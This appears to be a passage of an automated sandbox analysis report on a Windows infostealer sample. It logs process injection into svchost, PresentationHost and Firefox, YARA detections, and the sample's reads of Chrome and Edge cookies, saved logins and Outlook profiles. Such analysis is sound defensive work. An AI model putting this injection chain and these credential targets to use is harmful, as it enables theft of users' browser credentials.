Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtUnmapViewOfSection: Direct from: 0x76F02D3C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\PresentationHost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: NULL target: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: NULL target: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Thread register set: target process: 7764 Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 29B4008 Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00658C93 LogonUserW, 0_2_00658C93
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00603B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00603B4C
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00604A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00604A35
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00664EF5 mouse_event, 0_2_00664EF5
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\nJ8mJTmMf0.exe" Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Process created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_006581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_006581F7
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00664C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00664C03
Source: nJ8mJTmMf0.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: nJ8mJTmMf0.exe, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121602275.0000000001A81000.00000002.00000001.00040000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000000.1895094072.0000000001A81000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121602275.0000000001A81000.00000002.00000001.00040000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000000.1895094072.0000000001A81000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121602275.0000000001A81000.00000002.00000001.00040000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000000.1895094072.0000000001A81000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121602275.0000000001A81000.00000002.00000001.00040000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000000.1895094072.0000000001A81000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0062886B cpuid 0_2_0062886B
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_006350D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_006350D7
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00642230 GetUserNameW, 0_2_00642230
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0063418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_0063418A
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00604AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00604AFE

Stealing of Sensitive Information

barindex
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\PresentationHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: nJ8mJTmMf0.exe Binary or memory string: WIN_81
Source: nJ8mJTmMf0.exe Binary or memory string: WIN_XP
Source: nJ8mJTmMf0.exe Binary or memory string: WIN_XPe
Source: nJ8mJTmMf0.exe Binary or memory string: WIN_VISTA
Source: nJ8mJTmMf0.exe Binary or memory string: WIN_7
Source: nJ8mJTmMf0.exe Binary or memory string: WIN_8
Source: nJ8mJTmMf0.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

barindex
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00676596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00676596
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00676A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00676A5A
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs